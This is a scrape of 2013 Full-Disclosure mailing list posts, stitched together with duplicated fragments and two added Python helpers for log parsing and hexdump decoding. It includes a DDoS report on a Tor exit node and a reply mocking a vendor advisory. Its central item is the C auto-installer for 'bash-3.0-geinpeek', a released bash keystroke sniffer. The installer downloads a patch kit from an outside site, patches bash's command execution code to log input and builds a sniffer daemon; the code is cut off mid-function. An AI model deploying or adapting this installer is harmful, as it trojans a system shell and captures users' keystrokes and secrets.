> ba0 3220 3a30 3135 303a 2034 6174 6567 7573
> bb0 7568 7520 6573 2e72 6177 6e72 6b20 7265
> bc0 656e 3a6c 5b20 6168 6d6d 7265 205d 203a
> bd0 4e49 763d 616c 326e 4f20 5455 203d 414d
> be0 3d43 3030 323a 3a31 3732 663a 3a61 6464
> bf0 343a 3a34 3030 313a 3a35 3966 323a 3a61
> c00 6639 643a 3a39 3830 303a 3a30 3534 303a
> c10 3a30 3030 333a 2034 5253 3d43 3132 2e36
> c20 3432 2e35 3232 2e31 3031 2037 5344 3d54
> c30 3831 2e39 3833 322e 3533 322e 3035 4c20
> c40 4e45 353d 2032 4f54 3d53 7830 3030 5020
> c50 4552 3d43 7830 3030 5420 4c54 343d 2038
> c60 4449 313d 3335 3431 4420 2046 5250 544f
> c70 3d4f 4354 2050 5053 3d54 3932 3635 4420
> c80 5450 383d 3231 2033 4957 444e 574f 363d
> c90 3535 3533 5220 5345 303d 3078 2030 5953
> ca0 204e 5255 5047 303d 000a
> ca9
> 
> Attached is the list of participating IP addresses, line by line, with
> the count of packets received. The attacker started sending something
> like 4 packets per second and increased to over than 9000!!! - just
> kidding, over 30 per second.
> 
> JSYK, I welcome any comments.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
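
The per-source packet counts and the packets-per-second figures mentioned in the quoted post can be derived from netfilter LOG lines like its two samples. The following is an added example, not code from the thread: the log lines are constructed (documentation addresses), and `sample_line`, `parse_line` and `storm_summary` are hypothetical names.

```python
import ipaddress
import re
from collections import Counter

KV = re.compile(r"(\w+)=(\S*)")
TCP_FLAGS = {"URG", "ACK", "PSH", "RST", "SYN", "FIN"}

def sample_line(ts, src, dpt, flags):
    # Constructed log line in the layout of the samples in the post.
    return (f"Aug 13 {ts} gw user.warn kernel: [hammer] : IN=vlan2 OUT= "
            f"SRC={src} DST=192.0.2.1 LEN=52 TTL=48 PROTO=TCP SPT=1757 "
            f"DPT={dpt} WINDOW=65535 RES=0x00 {flags} URGP=0")

SAMPLE_LOG = [
    sample_line("20:39:14", "198.51.100.10", 8123, "SYN"),
    sample_line("20:39:14", "198.51.100.11", 8123, "SYN"),
    sample_line("20:39:14", "198.51.100.10", 8123, "SYN"),
    sample_line("20:39:15", "203.0.113.7", 8123, "SYN"),
    sample_line("20:39:15", "203.0.113.9", 9001, "ACK"),        # other port
    sample_line("20:39:16", "198.51.100.10", 8123, "ACK SYN"),  # not a bare SYN
]

def parse_line(line):
    """Split one kernel LOG line into KEY=value fields plus its TCP flags."""
    head, sep, rest = line.partition(" kernel: ")
    if not sep:
        return None
    fields = dict(KV.findall(rest))
    fields["flags"] = set(rest.split()) & TCP_FLAGS  # flags are bare tokens
    fields["ts"] = head[:15]                         # e.g. "Aug 13 20:39:14"
    return fields

def storm_summary(lines, dport):
    """Count bare SYNs to dport per source, per /24, and per second."""
    per_src, per_net, per_sec = Counter(), Counter(), Counter()
    for line in lines:
        f = parse_line(line)
        if not f or f.get("PROTO") != "TCP" or f.get("DPT") != str(dport):
            continue
        if f["flags"] != {"SYN"}:
            continue
        per_src[f["SRC"]] += 1
        net = ipaddress.ip_network(f["SRC"] + "/24", strict=False)
        per_net[str(net)] += 1
        per_sec[f["ts"]] += 1
    return {"sources": len(per_src), "per_src": per_src, "per_net": per_net,
            "peak_pps": max(per_sec.values(), default=0)}
```

Grouping by /24 next to the per-address count makes it easier to check which network ranges the sources actually fall into before attributing them to a single provider.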


[Full-disclosure] bash-3.0-geinpeek shell sniffer release!

2013-08-16 Thread x90c
Hi folks! I release it.
It's my old project to sniff keystrokes on the bash shell.

x90c


bash-3.0-geinpeek-0.2.tar.gz
Description: GNU Zip compressed data
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*

	bash-3.0-geinpeek-0.2 auto installer

	( install-0.2.c )

	compile # gcc install-0.2.c -o install-0.2
	execute # ./install-0.2
*/


/* tmp dir for installing */
#define	DOWNLOAD_DIR	"/root/tmp"

/* ANSI color macro */
#define SET_ANSI(){ printf("\033[0;44;36m"); }
#define UNSET_ANSI(){   printf("\033[0m");  }


/* prototype */
int download_file(char *src_url);
int checking_file(char *bin_file);
int xtract_package(char *src_url);
void select_and_patch();
void compile_geinpeek_bash();
void make_install();
void make_clean();

char needed[5][16]=
{
"/bin/bash",
"/usr/bin/patch",
"/usr/bin/wget",
"/bin/tar",
"\x00",
};

char download_list[3][128]=
{
	"http://ftp.gnu.org/pub/gnu/bash/bash-3.0.tar.gz",
	"http://www.x90c.org/projects/bash-3.0-geinpeek/bash-3.0-geinpeek-0.2.tar.gz",
	"\x00",
};

char needed_patch_list[3][64]=
{
	"Makefile.in-geinpeek.diff",
	"ghelper.c",/* sniff daemon */
	"\x00",
};
char patchkit_list[3][64]=
{
	"execute_cmd.c-geinpeek.diff",		/* main sniffing patch */
	"shell.c-geinpeek.diff",
	"\x00",	
};

char cong[]=
{
	"welcome to BASH-GEINPEEK\n\n"
	"quick execuee : # ghelper 90.txt\n"
};
	

int main()
{

	unsigned int i = 0, ret = 0;

	system("rm -rf /root/tmp");

	if(strcmp(getenv("SHELL"), "/bin/bash") == 0){
		fprintf(stderr, "\n\nfailed. to change default shell to csh!\n\n");
		return(1);
	}

	for(i = 0; download_list[i][0] != '\x00'; i++){
		if(download_file(download_list[i]) != 0){
			ret ++;
			fprintf(stderr, "failed source code(tar.gz) download :\n\t=> %s\n", download_list[i]);
		}
	}

	printf("\n");

	if(ret != 0)
		return(2);

	ret = 0;

	for(i = 0; needed[i][0] != '\x00'; i++){
		if(checking_file(needed[i]) != 0){
			ret ++;
			fprintf(stderr, "needed utility : %s\n", needed[i]);
		} else{
			printf("check: %s : found!\n", needed[i]);
		}
	}
	
	if(ret != 0)
		return(3);

	printf("\n");

	for(i = 0; download_list[i][0] != '\x00'; i++){
		if(xtract_package(download_list[i]) != 0){
			ret ++;
			fprintf(stderr, "failed downloaded file(tar.gz) extract :\n\t=> %s\n", download_list[i]);
		} else{
			printf("extract: %s : success!\n", download_list[i]);
		}
	}

	if(ret != 0)
		return(4);

	ret = 0;

	printf("\n");
	
	select_and_patch();	

	printf("\n");

	compile_geinpeek_bash();

	printf("\n");
	
	make_install();
	
	SET_ANSI();
	fprintf(stdout, "%s\n", cong);
	UNSET_ANSI();

	make_clean();

}

#define	OK_MARK		"200 OK"

int download_file(char *src_url)
{
	char sho[128];
	FILE *pfp;
	char msg_buf[2048];
	unsigned int indx = 0;

	sprintf(sho, "%s %s -P %s", needed[2], src_url, DOWNLOAD_DIR);

	if((pfp = popen(sho, "r")) == NULL){
		fprintf(stderr, "\n\n%s : error\n\n", sho);
		goto failed;
	}

	while(!feof(pfp))
		msg_buf[indx++] = fgetc(pfp);

	if(strstr(msg_buf, OK_MARK) != NULL){
		fprintf(stderr, "\n\n%s : source code file not found\n\n", src_url);
		goto failed;
	}


success:
	pclose(pfp);
	return(0);

failed:
	pclose(pfp);
	make_clean();

}


void make_clean()
{
	char sho[128];

	sprintf(sho, "rm -rf %s\n", DOWNLOAD_DIR);
	system(sho);

	printf("cleanup: rm -rf %s\n", DOWNLOAD_DIR);

	printf("bye!\n");

	exit(1);

}


int checking_file(char *bin_file)
{
	return access(bin_file, X_OK);
}

#define	ERROR_MARK	"Error exit"

int xtract_package(char *src_url)
{
	char sho[128];
	FILE *pfp;
	char msg_buf[65535];
	unsigned int indx = 0, indxx = 0;
	char *src_file;


	/* real filename extract from the URL */


	if((src_file = strrchr(src_url, '/')) == NULL){
		fprintf(stderr, "\n\n%s : invalid URL\n\n", src_url);
		goto failed;
	}

	sprintf(sho, "%s xzvf %s%s -C %s", needed[3], DOWNLOAD_DIR, src_file, DOWNLOAD_DIR);

	if((pfp = popen(sho, "r")) == NULL){
		fprintf(stderr, "\n\n%s : error\n\n", sho);
		goto failed;
	}

	while(!feof(pfp))
		msg_buf[indx++] = fgetc(pfp);

	if(strstr(msg_buf, ERROR_MARK) != NULL){
		fprintf(stderr, "\n\n%s : source code file extract error\n\n", src_file);
		goto failed;
	}


success:
	pclose(pfp);
	return(0);

failed:
	pclose(pfp);
	make_clean();

}

void select_and_patch()
{
	unsigned int indsx = 0;
	char sho[128];
	char c;

	for(indsx = 0; needed_patch_list[indsx][0] != '\x00'; indsx++){
		sprintf(sho, "mv %s/bash-3.0-geinpeek-0.2/%s %s/bash-3.0", 
			DOWNLOAD_DIR, needed_patch_list[indsx], DOWNLOAD_DIR);
		system(sho);

		if(strstr(needed_patch_list[indsx], ".diff") != NULL){
			printf("needed patch : %s [ applied ]\n", needed_patch_list[indsx]);
			sprintf(sho, "cd %s/bash-3.0/; patch -f < %s", DOWNLOAD_DIR, needed_patch_list[indsx]);
			system(sho);
		}
	}

	for(indsx = 0; patchkit_list[indsx][0] != '\x00'; indsx++){
		sprintf(

[Full-disclosure] Who's behind limestonenetworks.com AKA DDoS on polipo(8123)

2013-08-16 Thread Luther Blissett
Hello dear companions,

Two days ago one of my tor exit nodes experienced something I'm now
calling "limestonenetworks DDoS on polipo" ( $WAN_IP:8123 ), since all
packets in the storm were flowing from a range of 514 different IP
addresses, all of them inside limestonenetworks IP range and targeting
port 8123 on my tor exit node WAN IP.

Before the packet storm, I could observe a huge increase on attempts to
access my WAN domain through tor. I couldn't relate IP addresses from
this first raise to those responsible for the actual packet storm nor
could I identify some useful pattern there, but they were all coming
from port 9001 and increased just some hours before the storm, so I'm
guessing they are related somehow.

Also, throughout the storm, one of my log files got corrupted with some
unreadable bin garbage. I do not know if it was intended/targeted
exploit, but I'm reworking secrets and trying to figure out what is this
binary.

Here is a sample line of a WAN attempt:

Aug 13 16:50:22 $USER user.warn kernel: [DROP INVALID WAN] : IN=vlan2
OUT= MAC=xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx
SRC=77.56.151.190 DST=xxx.xxx.xxx.xxx LEN=52 TOS=0x00 PREC=0x00 TTL=43
ID=38787 DF PROTO=TCP SPT=40888 DPT=9001 SEQ=289854459 ACK=41163

Here is a sample line of packet storm:

Aug 13 20:39:14 $USER user.warn kernel: [hammer] : IN=vlan2 OUT=
MAC=xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx
SRC=74.63.216.60 DST=xxx.xxx.xxx.xxx LEN=52 TOS=0x00 PREC=0x00 TTL=48
ID=20269 DF PROTO=TCP SPT=1757 DPT=8123 WINDOW=65535 RES=0x00 SYN URGP=0
OP

The attack persisted for at least three hours and left this binary (hex
represented):

000        
*
b90       2067 3331
ba0 3220 3a30 3135 303a 2034 6174 6567 7573
bb0 7568 7520 6573 2e72 6177 6e72 6b20 7265
bc0 656e 3a6c 5b20 6168 6d6d 7265 205d 203a
bd0 4e49 763d 616c 326e 4f20 5455 203d 414d
be0 3d43 3030 323a 3a31 3732 663a 3a61 6464
bf0 343a 3a34 3030 313a 3a35 3966 323a 3a61
c00 6639 643a 3a39 3830 303a 3a30 3534 303a
c10 3a30 3030 333a 2034 5253 3d43 3132 2e36
c20 3432 2e35 3232 2e31 3031 2037 5344 3d54
c30 3831 2e39 3833 322e 3533 322e 3035 4c20
c40 4e45 353d 2032 4f54 3d53 7830 3030 5020
c50 4552 3d43 7830 3030 5420 4c54 343d 2038
c60 4449 313d 3335 3431 4420 2046 5250 544f
c70 3d4f 4354 2050 5053 3d54 3932 3635 4420
c80 5450 383d 3231 2033 4957 444e 574f 363d
c90 3535 3533 5220 5345 303d 3078 2030 5953
ca0 204e 5255 5047 303d 000a   
ca9

Attached is the list of participating IP addresses, line by line, with
the count of packets received. The attacker started sending something
like 4 packets per second and increased to over than 9000!!! - just
kidding, over 30 per second.

JSYK, I welcome any comments.
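
The dump in the post has the layout of default `hexdump` output: an offset column, 16-bit words, `*` for repeated rows and a final length line. Assuming that format (little-endian words, as on x86), the following added example, which is not code from the thread, turns such a dump back into bytes so that any text in it can be read; the sample dump is constructed, and `decode_hexdump` and `summarize` are hypothetical names.

```python
# Constructed sample: 32 NUL bytes followed by one short log-like line.
SAMPLE_DUMP = """\
0000000 0000 0000 0000 0000 0000 0000 0000 0000
*
0000020 7541 2067 3331 6b20 7265 656e 3a6c 5b20
0000030 6168 6d6d 7265 205d 5044 3d54 3138 3332
0000040 000a
0000041
"""

def decode_hexdump(text):
    """Rebuild the original bytes from hexdump-style 16-bit word output."""
    out = bytearray()
    last_row = b""
    squeezed = False
    for line in text.splitlines():
        fields = line.split()
        if not fields:
            continue
        if fields[0] == "*":          # previous row repeats until next offset
            squeezed = True
            continue
        offset = int(fields[0], 16)
        if squeezed:
            if not last_row:
                raise ValueError("'*' without a preceding data row")
            while len(out) < offset:
                out += last_row
            del out[offset:]
            squeezed = False
        if len(fields) == 1:          # final line: total length of the input
            del out[offset:]          # drops the pad byte of an odd-sized file
            break
        # Each word is printed most-significant byte first, so the two bytes
        # of every pair appear swapped relative to their order in the file.
        row = b"".join(int(w, 16).to_bytes(2, "little") for w in fields[1:])
        out += row
        last_row = row
    return bytes(out)

def summarize(data):
    """Report the size, the leading NUL run and the remaining text."""
    body = data.lstrip(b"\x00")
    return {"size": len(data),
            "leading_nuls": len(data) - len(body),
            "text": body.decode("ascii", errors="replace")}
```

Because each pair of bytes is shown swapped, plain ASCII text looks unreadable in this view until the words are put back in file order.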

Re: [Full-disclosure] Google - (Pin via Postal Delivery) Information Disclosure - Video

2013-08-16 Thread Julius Kivimäki
So, what exactly is this "advisory" supposed to be about?  The lack of your
camera skills? Or perhaps about the fact that google sent you a letter?
Oh, and I really wonder how you calculated your CVSS. The NVD calculator
comes up with 0 for me.


2013/8/16 Vulnerability Lab 

> Title:
> ======
> Google - (Pin via Postal Delivery) Information Disclosure :)
>
>
> Date:
> =====
> 2013-08-15
>
>
> References:
> ===========
> http://www.vulnerability-lab.com/get_content.php?id=1046
>
> View: http://www.youtube.com/watch?v=nnAAdX9a3eU
>
>
>
> VL-ID:
> ======
> 1046
>
>
> Common Vulnerability Scoring System:
> ====================================
> 4.5
>
>
> Status:
> =======
> Published
>
>
> Exploitation-Technique:
> =======================
> Defensiv
>
>
> Severity:
> =========
> Medium
>
>
> Details:
> ========
> The video shows the session of a german researcher of the laboratory. The
> video explains an information disclosure issue inside of
> the postal delivery infrastructure service of google to verify a business
> account.
>
>
> Credits:
> ========
> Vulnerability Laboratory [Research Team]
>
>
> Disclaimer:
> ===========
> The information provided in this advisory is provided as it is without any
> warranty. Vulnerability Lab disclaims all warranties,
> either expressed or implied, including the warranties of merchantability
> and capability for a particular purpose. Vulnerability-
> Lab or its suppliers are not liable in any case of damage, including
> direct, indirect, incidental, consequential loss of business
> profits or special damages, even if Vulnerability-Lab or its suppliers
> have been advised of the possibility of such damages. Some
> states do not allow the exclusion or limitation of liability for
> consequential or incidental damages so the foregoing limitation
> may not apply. We do not approve or encourage anybody to break any vendor
> licenses, policies, deface websites, hack into databases
> or trade with fraud/stolen material.
>
> Domains:www.vulnerability-lab.com   - www.vuln-lab.com
>   - www.evolution-sec.com
> Contact:ad...@vulnerability-lab.com -
> resea...@vulnerability-lab.com   - ad...@evolution-sec.com
> Section:www.vulnerability-lab.com/dev   -
> forum.vulnerability-db.com   -
> magazine.vulnerability-db.com
> Social: twitter.com/#!/vuln_lab -
> facebook.com/VulnerabilityLab-
> youtube.com/user/vulnerability0lab
> Feeds:  vulnerability-lab.com/rss/rss.php   -
> vulnerability-lab.com/rss/rss_upcoming.php   -
> vulnerability-lab.com/rss/rss_news.php
>
> Any modified copy or reproduction, including partially usages, of this
> file requires authorization from Vulnerability Laboratory.
> Permission to electronically redistribute this alert in its unmodified
> form is granted. All other rights, including the use of other
> media, are reserved by Vulnerability-Lab Research Team or its suppliers.
> All pictures, texts, advisories, source code, videos and
> other information on this website is trademark of vulnerability-lab team &
> the specific authors or managers. To record, list (feed),
> modify, use or edit our material contact (ad...@vulnerability-lab.com or
> resea...@vulnerability-lab.com) to get a permission.
>
> Copyright © 2013 | Vulnerability
> Laboratory [Evolution Security]
>
>
>
> --
> VULNERABILITY LABORATORY RESEARCH TEAM
> DOMAIN: www.vulnerability-lab.com
> CONTACT: resea...@vulnerability-lab.com
>
>